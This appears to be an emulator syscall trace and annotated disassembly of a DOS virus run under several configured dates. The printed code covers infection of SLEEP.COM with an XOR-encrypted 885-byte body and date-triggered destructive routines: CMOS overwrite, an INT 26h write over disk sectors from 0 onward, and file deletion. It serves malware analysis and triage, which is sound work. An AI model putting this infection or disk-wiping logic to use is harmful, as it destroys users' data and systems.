; The window is a fixed-length excerpt and runs past the final ret.
2018-12-25T12:41:54.828518086Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl ; store DL; bp+0x475 is inside the written image but past the XORed range - presumably the key slot, possibly the immediate of the xor at 0x12db3 (TODO confirm in a debugger)
0x12d96: call 0x12dac                    ; first XOR pass over the body, before the write
0x12d99: mov ah, 0x40                    ; INT 21h AH=40h: write to file/device (BX = handle, not set in this window)
0x12d9b: mov cx, 0x375                   ; byte count 0x375 = 885, matches "Write 885 bytes" in the log
0x12d9e: lea dx, word ptr [bp + 0x106]   ; DS:DX = start of the buffer to write
0x12da2: int 0x21
0x12da4: call 0x12dac                    ; second XOR pass; XOR with the same key undoes the first pass in memory
0x12da7: mov ah, 0x3e                    ; INT 21h AH=3Eh: close handle
0x12da9: int 0x21
0x12dab: ret
; --- XOR loop: 0x336 bytes starting at bp+0x120 ---
0x12dac: lea si, word ptr [bp + 0x120]   ; si = first byte of the XORed range
0x12db0: mov cx, 0x336                   ; cx = number of bytes to process
0x12db3: xor byte ptr [si], 0            ; key operand reads 0 in this snapshot (a no-op); presumably overwritten with the stored DL before the loop runs - TODO confirm
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3                     ; repeat until cx reaches 0
0x12dba: ret
; NOTE(review): the three lines below follow the ret and are likely data
; bytes decoded as instructions; the trace does not establish this.
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:54.832094515Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:54.853690365Z 62 PC: 12dab | Close file
2018-12-25T12:41:54.863962622Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.8682073Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.874657955Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.881130067Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.883948237Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.886290423Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.88917715Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.891492237Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.894147675Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.902536275Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.911504306Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.917116942Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.923531178Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.929999085Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.932501659Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.934275256Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.939029904Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.941899794Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.944670638Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.953041608Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.976371129Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.979047737Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.985734429Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.998849213Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.000366631Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.001928028Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.004985096Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.007319637Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.009968267Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.018319108Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.027110529Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.029664095Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.036046742Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.042737814Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.044326903Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.04586654Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.049470568Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.050888472Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.053155239Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.062159024Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.06995341Z 26 PC: 12aeb | Set disk transfer address
; Date/time trigger chain, window starting at the return from "Get date"
; (INT 21h AH=2Ah returns DH = month, DL = day, CX = year).
; Read straight through, the visible tests are:
;   month == 7 and day == 14   -> call 0x12b2e
;   month >= 11 and day >= 8   -> call 0x12b3b
;   month >= 3                 -> call 0x12b4b
;   then Get time and a test on DL (hundredths of a second).
; The conditions are independent, so more than one routine can run on the
; same date. The viewer cuts this window after the cmp at 0x12b25.
2018-12-25T12:41:55.070965345Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7 ; month == 7 (July)?
0x12afa: jne 0x12b04                     ; no: skip to the next date test
0x12afc: cmp dl, 0xe                     ; day == 14?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e                    ; both matched: routine at 0x12b2e (shown in other windows writing to I/O ports 0x70/0x71)
0x12b04: mov ah, 0x2a                    ; INT 21h AH=2Ah: read the date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb                     ; month < 11?
0x12b0b: jl 0x12b15                      ; yes: skip
0x12b0d: cmp dl, 8                       ; day < 8?
0x12b10: jl 0x12b15                      ; yes: skip
0x12b12: call 0x12b3b                    ; month >= 11 and day >= 8: routine at 0x12b3b (INT 26h disk write in other windows)
0x12b15: mov ah, 0x2a                    ; INT 21h AH=2Ah: read the date a third time
0x12b17: int 0x21
0x12b19: cmp dh, 3                       ; month < 3?
0x12b1c: jl 0x12b21                      ; yes: skip
0x12b1e: call 0x12b4b                    ; month >= 3: routine at 0x12b4b (begins with AH=13h, delete file)
0x12b21: mov ah, 0x2c                    ; INT 21h AH=2Ch: get time, DL = hundredths of a second
0x12b23: int 0x21
0x12b25: cmp dl, 0x19                    ; compare hundredths with 25; the branch that uses this is outside the window
; Window at the return from the second "Get date" call (DH = month,
; DL = day). It covers the remaining date tests, the time test, and the
; first four instructions of the routine at 0x12b2e, where the viewer cuts it.
2018-12-25T12:41:55.07313528Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb ; month < 11?
0x12b0b: jl 0x12b15                      ; yes: skip the call below
0x12b0d: cmp dl, 8                       ; day < 8?
0x12b10: jl 0x12b15                      ; yes: skip the call below
0x12b12: call 0x12b3b                    ; month >= 11 and day >= 8: routine at 0x12b3b
0x12b15: mov ah, 0x2a                    ; INT 21h AH=2Ah: read the date again
0x12b17: int 0x21
0x12b19: cmp dh, 3                       ; month < 3?
0x12b1c: jl 0x12b21                      ; yes: skip
0x12b1e: call 0x12b4b                    ; month >= 3: routine at 0x12b4b
0x12b21: mov ah, 0x2c                    ; INT 21h AH=2Ch: get time, DL = hundredths of a second
0x12b23: int 0x21
0x12b25: cmp dl, 0x19                    ; hundredths >= 25?
0x12b28: jge 0x12b2d                     ; yes: return without calling 0x12b7e
0x12b2a: call 0x12b7e                    ; hundredths < 25: routine at 0x12b7e, not disassembled on this page
0x12b2d: ret
; --- routine at 0x12b2e (called when month == 7 and day == 14) ---
; Ports 0x70/0x71 are the PC CMOS/RTC index and data ports.
0x12b2e: mov al, 0x25                    ; first CMOS register index
0x12b30: out 0x70, al                    ; select CMOS register AL
0x12b32: out 0x71, al                    ; write the same value AL into that register
0x12b34: dec al                          ; next lower index; the loop test is outside this window
; Window at the return from the third "Get date" call (DH = month).
; It covers the month >= 3 test, the time test, the complete routine at
; 0x12b2e and the first four instructions of the routine at 0x12b3b.
; In this run the next log entry is "Delete file" at PC 12b55, which is
; consistent with the call at 0x12b1e being taken (run config: Month 11).
2018-12-25T12:41:55.075875777Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3 ; month < 3?
0x12b1c: jl 0x12b21                      ; yes: skip
0x12b1e: call 0x12b4b                    ; month >= 3: routine at 0x12b4b
0x12b21: mov ah, 0x2c                    ; INT 21h AH=2Ch: get time, DL = hundredths of a second
0x12b23: int 0x21
0x12b25: cmp dl, 0x19                    ; hundredths >= 25?
0x12b28: jge 0x12b2d                     ; yes: return
0x12b2a: call 0x12b7e                    ; hundredths < 25: routine at 0x12b7e, not disassembled on this page
0x12b2d: ret
; --- routine at 0x12b2e: CMOS overwrite (called on month 7, day 14) ---
; Walks AL from 0x25 down to 1 and, for each value, selects CMOS register
; AL through port 0x70 and writes AL into it through port 0x71. On real
; hardware this replaces the stored clock/configuration bytes in that
; range; under emulation the effect depends on the emulated CMOS.
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al                    ; CMOS index port
0x12b32: out 0x71, al                    ; CMOS data port
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30                     ; loop until AL reaches 0 (register 0 itself is not written)
0x12b3a: ret
; --- routine at 0x12b3b (called when month >= 11 and day >= 8) ---
0x12b3b: mov ah, 0x19                    ; INT 21h AH=19h: get default drive, AL = drive number (0 = A:)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111                  ; sector count for the call that follows outside this window
0x12b42: mov dx, 0                       ; starting logical sector 0
2018-12-25T12:41:55.077851218Z 19 PC: 12b55 | Delete file
; Window at the return from "Get time" (INT 21h AH=2Ch, DL = hundredths of
; a second). It covers the time test, the CMOS routine at 0x12b2e, the
; whole disk-write routine at 0x12b3b and the first two instructions of
; the routine at 0x12b4b.
2018-12-25T12:41:55.083429727Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19 ; hundredths >= 25?
0x12b28: jge 0x12b2d                     ; yes: return
0x12b2a: call 0x12b7e                    ; hundredths < 25 (about one run in four): routine at 0x12b7e, not shown on this page
0x12b2d: ret
; --- routine at 0x12b2e: writes AL to CMOS register AL for AL = 0x25..1 ---
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al                    ; CMOS index port
0x12b32: out 0x71, al                    ; CMOS data port
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
; --- routine at 0x12b3b: absolute disk write (month >= 11 and day >= 8) ---
; INT 26h takes AL = drive, CX = sector count, DX = first logical sector,
; DS:BX = source buffer. AL comes from AH=19h; BX and DS are not set here,
; so the data written is whatever DS:BX points at. Logical sector 0 onward
; holds the boot sector, FATs and root directory on a FAT volume, so this
; is the destructive payload to watch for when triaging an infected host.
0x12b3b: mov ah, 0x19                    ; INT 21h AH=19h: AL = default drive (0 = A:)
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111                  ; 0x1111 sectors
0x12b42: mov dx, 0                       ; starting at logical sector 0
0x12b45: int 0x26                        ; DOS absolute disk write
0x12b47: add sp, 2                       ; INT 26h returns with the flags word still on the stack; discard it
0x12b4a: ret
; --- routine at 0x12b4b (month >= 3); cut by the viewer after two lines ---
0x12b4b: mov ah, 0x13                    ; INT 21h AH=13h: delete file via FCB; matches syscall op 19 "Delete file" logged at PC 12b55
0x12b4d: push cs                         ; presumably sets up DS for the FCB pointer - the rest is outside the window

{"DateBased":true,"Day":8,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:54.789931189Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:54.791480981Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:54.79256162Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:54.793627707Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:54.799882986Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:54.806667157Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:54.813072313Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:54.814679557Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:54.820762124Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:54.82437109Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:54.826428527Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:54.83213139Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:54.853554406Z 62 PC: 12dab | Close file
2018-12-25T12:41:54.86196327Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.86528326Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.871967609Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.87843019Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.880918679Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.882602128Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.885520991Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.888262273Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.890780422Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.899039966Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.908041809Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.910915898Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.917575086Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.924291219Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.926259814Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.928601593Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.931503857Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.933612606Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.936278611Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.944632216Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.953355723Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:54.955939898Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:54.962343925Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:54.969159609Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:54.970624679Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:54.971991649Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:54.977581602Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:54.978998407Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:54.981689934Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:54.990564461Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:54.999517789Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.002339604Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.009560901Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.016014557Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.017629743Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.020088799Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.023273284Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.024870226Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.028185864Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.036866806Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.044864044Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.04632994Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
; Window at the return from the second "Get date" call (DH = month,
; DL = day). The JSON config above this trace sets Day 8, Month 11, and the
; next log entry is "Get default drive" at PC 12b3f, i.e. the return
; address of the INT 21h inside the routine at 0x12b3b - so the call at
; 0x12b12 was taken in this run.
; NOTE(review): every logged entry on this page is an INT 21h function, so
; the absence of an INT 26h entry does not show whether the disk write ran.
2018-12-25T12:41:55.049397134Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb ; month < 11?
0x12b0b: jl 0x12b15                      ; yes: skip the call below
0x12b0d: cmp dl, 8                       ; day < 8?
0x12b10: jl 0x12b15                      ; yes: skip the call below
0x12b12: call 0x12b3b                    ; month >= 11 and day >= 8: routine at 0x12b3b
0x12b15: mov ah, 0x2a                    ; INT 21h AH=2Ah: read the date again
0x12b17: int 0x21
0x12b19: cmp dh, 3                       ; month < 3?
0x12b1c: jl 0x12b21                      ; yes: skip
0x12b1e: call 0x12b4b                    ; month >= 3: routine at 0x12b4b
0x12b21: mov ah, 0x2c                    ; INT 21h AH=2Ch: get time, DL = hundredths of a second
0x12b23: int 0x21
0x12b25: cmp dl, 0x19                    ; hundredths >= 25?
0x12b28: jge 0x12b2d                     ; yes: return
0x12b2a: call 0x12b7e                    ; hundredths < 25: routine at 0x12b7e, not disassembled on this page
0x12b2d: ret
; --- routine at 0x12b2e (month 7, day 14): CMOS index/data port writes ---
0x12b2e: mov al, 0x25                    ; first CMOS register index
0x12b30: out 0x70, al                    ; select CMOS register AL
0x12b32: out 0x71, al                    ; write AL into that register
0x12b34: dec al                          ; next lower index; the loop test is outside this window
2018-12-25T12:41:55.051749094Z 25 PC: 12b3f | Get default drive
2018-12-25T12:41:55.054850541Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.058231248Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:55.067597051Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.059081859Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:55.060945312Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:55.062600947Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:55.064380134Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.072133525Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.082856856Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.089750861Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.091178605Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.093300711Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.096063392Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:55.097510247Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.104604881Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.120852856Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.12953317Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.132980471Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.140399483Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.14766137Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.150009629Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.151682837Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.154519434Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.156429218Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.159888754Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.169334102Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.178822869Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.182751967Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.189886287Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.1968258Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.198755908Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.20023145Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.202964188Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.2050722Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.207875534Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.221036698Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.230517068Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.233684483Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.245709254Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.253895881Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.255691465Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.257317312Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.261810505Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.264052002Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.267129399Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.277271949Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.286815683Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.290133446Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.297855268Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.304483804Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.306096173Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.307337987Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.309694065Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.311189539Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.313195408Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.31987458Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.326136761Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.327117913Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.330061561Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.33249215Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.334831046Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.278114186Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:55.280977263Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:55.282811675Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:55.284483208Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.291933121Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.299996736Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.307323064Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.309230201Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.311526559Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.314465111Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:55.315870183Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
